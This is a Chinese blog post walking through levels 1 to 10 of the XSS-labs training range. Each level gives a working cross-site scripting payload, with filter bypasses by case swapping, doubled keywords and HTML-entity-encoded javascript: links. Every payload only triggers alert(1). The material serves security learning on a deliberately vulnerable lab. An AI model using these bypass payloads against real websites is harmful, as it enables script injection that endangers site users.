首页 > 其他分享 >XSS-labs-master的1-10关速通

XSS-labs-master的1-10关速通

时间:2024-07-19 22:55:13浏览次数:15  
标签:XSS Level 关速通 alert labs 点击 &# onclick 97

目录

Level-1

Level-2

Level-3

Level-4

Level-5

Level-6

Level-7

Level-8

Level-9

Level-10


靶场下载地址:

靶场搭建:https://mp.csdn.net/mp_blog/creation/editor/139561853

Level-1

?name=<script>alert()</script>

Level-2

?keyword="><script>alert(1)</script>
"onclick="alert(1)

Level-3

'onclick='alert(1)
' onclick ='javascript:alert(1)'//
'onclick=javascript:alert() '

点搜索之后再点击搜索框就过关了

Level-4

尝试之后发现和第3关一样

"onclick="alert(1)

Level-5

"><a href="javascript:alert(1)">aa</a>

点击aa

Level-6

"Onclick="alert(1)

使用大小写绕过,搜索之后点击搜索框

Level-7

"oonnclick="alert(1)

使用双写绕过,搜索之后点击搜索框

Level-8

文本框输入的内容传到这个友情链接里面,并且还作为href参数,使用伪协议啊,试了发现script被替换,然后编码

&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;:alert(1)

添加友情链接——点击友情链接

Level-9

&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;:alert(1)/*http://*/

Level-10

t_link=aaaaaa&t_sort=aaaaaaaaa" type="text" onclick="alert(1)&t_history=aaaaaaa

点击输入框

标签:XSS,Level,关速通,alert,labs,点击,&#,onclick,97
From: https://blog.csdn.net/weixin_68416970/article/details/140478884

相关文章

  • 【Loading 4/75】Web_SQLi-Labs_WriteUp
    Less-1_GET-Errorbased-Singlequotes-String题目分析根据标题“GET-Errorbased-Singlequotes-String(基于错误的GET单引号字符型注入)”可以猜到本题的闭合方法为单引号闭合,但保险起见咱还是走一遍流程。根据页面给出的提示信息“PleaseinputtheIDasparameterwith......
  • ctfshow web入门 xss web327--web333 存储型和七七八八的
    存储型漏洞web327这道题貌似和反射型的xss差不多,直接打就行web328body和svg的好像不行<script>window.open('http://ceye地址/'+document.cookie)</script><script>window.open('http://hrcgnc.ceye.io/'+document.cookie)</script>先注册,密码多于6位很明显在这......
  • postMessageXss续2
      原文地址如下:https://research.securitum.com/art-of-bug-bounty-a-way-from-js-file-analysis-to-xss/  在19年我写了一篇文章,是基于postMessageXss漏洞的入门教学:https://www.cnblogs.com/piaomiaohongchen/p/14727871.html   这几天浏览mXss技术的时候,看到了一......
  • PHPStudy搭建xssplatform
    1、源码下载https://github.com/78778443/xssplatform2、安装配置修改配置文件 index.php    新建.htaccess文件<IfModulemod_rewrite.c>RewriteEngineOnRewriteBase/RewriteRule^([0-9a-zA-Z]{6})$/index.php?do=code&urlKey=$1[L]RewriteRule^do/auth/(......
  • 新手打 XSS-level(1-13) 靶场心得和总结
    提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档文章目录前言二、解题思路第一关:无过虑机制第二关:闭合标签第三关:单引号闭合+添加事件第四关:双引号闭合+添加事件第五关:不同标签的尝试(新建标签)第六关:大小写绕过第七关:直接将script关键字过滤掉(双写绕过)第......
  • XSS靶场——通关笔记
    第一关页面很简单,可以发现通过修改url中level1.php?name后面的字段,页面会改变,显示该字段的总长再查看源代码,根据源代码可知当有个弹窗就会执行函数,最后得到我们想要的“完成的不错”<script>alert(111)</script>第二关第二关似乎和第一关一样,不确定,试试同样的代码在......
  • 熊海CMS漏洞练习平台的一次xss、sql注入、越权黑盒思路分析
    简介熊海CMS是由熊海开发的一款功能丰富的网站综合管理系统,广泛应用于个人博客、个人网站以及企业网站,本文章用于黑盒测试,如果需要「源码审计」后台回复【「CMS」】获取即可,精心准备了40多个cms源码漏洞平台,供宝子们学习,一切资源免费image-20240714194841203image-20240......
  • ctfshow sql-labs(笔记)
    这是当时做题的时候记得笔记有些乱看不懂的可以私我判断闭合方式:id=1’and1=1–+*正常回显*id=1’and1=2–+*异常回显*id=1and1=1*正常回显*id=1and1=2*异常回显*id=1’)and1=1–+回显正常id=1’)and1=2–+回显异常id=1")and1=1–+正常回显id=1......
  • upload-labs靶场全题解
    ​​靶场搭建对php和apache版本有严格要求,建议使用phpstudy2018并且使用设置php版本为5.2.17,这个靶场比较老了,如果要复现的话,必要严格按照要求来使用,博主使用最新版的phpstudy在某些靶场上未能成功复现,所以浪费了很多时间。。。。。Upload-Labs环境要求操作系统:wind......
  • sqli-labs靶场第一关过关教程(保姆级教程:不是新手别进)
    SQL注入漏洞概述1、什么是SQL注入漏洞SQL注入漏洞是一个web层面的安全漏洞,web应用与数据库存在交互点,攻击者构建恶意SQL语句,欺骗数据库服务器执行非授权的查询。2、如何判断网页是否存在SQL注入漏洞1、web页面与数据库是否存在交互点,这个交互点就是注入点常见注入点:URL和......